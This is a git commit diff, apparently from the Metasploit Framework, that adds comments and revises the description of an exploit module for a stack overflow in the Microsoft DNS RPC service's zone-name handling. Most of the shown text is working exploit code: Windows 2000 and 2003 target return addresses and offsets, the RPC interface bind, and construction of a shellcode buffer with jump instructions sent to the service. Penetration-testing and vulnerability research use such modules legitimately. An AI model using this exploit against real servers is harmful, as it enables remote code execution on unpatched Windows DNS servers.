Cleanup, getting ready for stable
git-svn-id: file:///home/svn/framework3/trunk@4684 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
17082dda1a
commit
2612ad5f2f
|
@ -24,9 +24,11 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the RPC interface
|
||||
of the Microsoft DNS service. The vulnerability is triggered
|
||||
when a long zone name parameter is supplied that contains
|
||||
backslash characters.
|
||||
of the Microsoft DNS service. The vulnerability is triggered when
|
||||
a long zone name is supplied that contains escaped characters. This
|
||||
exploit will NOT work on Windows 2003 SP1 or SP2 if hardware DEP is
|
||||
enabled.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -68,10 +70,10 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
# WS2HELP.DLL
|
||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||
|
||||
# Unknown, probably bad :(
|
||||
# Unknown, probably unreliable
|
||||
[ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
|
||||
|
||||
# ATL.DLL (no SafeSEH)
|
||||
# ATL.DLL (no SafeSEH) (still blocked by hardware DEP)
|
||||
[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
|
||||
|
||||
],
|
||||
|
@ -86,6 +88,8 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
|
||||
def exploit
|
||||
|
||||
|
||||
# Ask the endpoint mapper to locate the port for us
|
||||
dport = datastore['RPORT'].to_i
|
||||
if (dport == 0)
|
||||
|
||||
|
@ -99,17 +103,21 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
|
||||
end
|
||||
|
||||
# Connect to the high RPC port
|
||||
connect(true, { 'RPORT' => dport })
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# Bind to the service
|
||||
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
# Create our buffer with our shellcode first
|
||||
txt = Rex::Text.rand_text_alphanumeric(8192)
|
||||
txt[0, payload.encoded.length] = payload.encoded
|
||||
|
||||
# Handle multi-return targets
|
||||
if (target['Addresses'])
|
||||
target['Addresses'].each do |ent|
|
||||
off, ret = ent
|
||||
|
@ -117,6 +125,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
txt[ off - 4, 2] = "\xeb\x06"
|
||||
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||
end
|
||||
# Handle single-return targets
|
||||
else
|
||||
off = target['Off']
|
||||
txt[ off ] = [target.ret].pack('V')
|
||||
|
@ -132,6 +141,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
req << c.to_s(8)
|
||||
end
|
||||
|
||||
# Build the RPC stub data
|
||||
stubdata =
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +
|
||||
|
@ -142,7 +152,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")
|
||||
|
||||
print_status('Sending exploit ...')
|
||||
print_status('Sending exploit...')
|
||||
|
||||
begin
|
||||
response = dcerpc.call(1, stubdata)
|
||||
|
|
Loading…
Reference in New Issue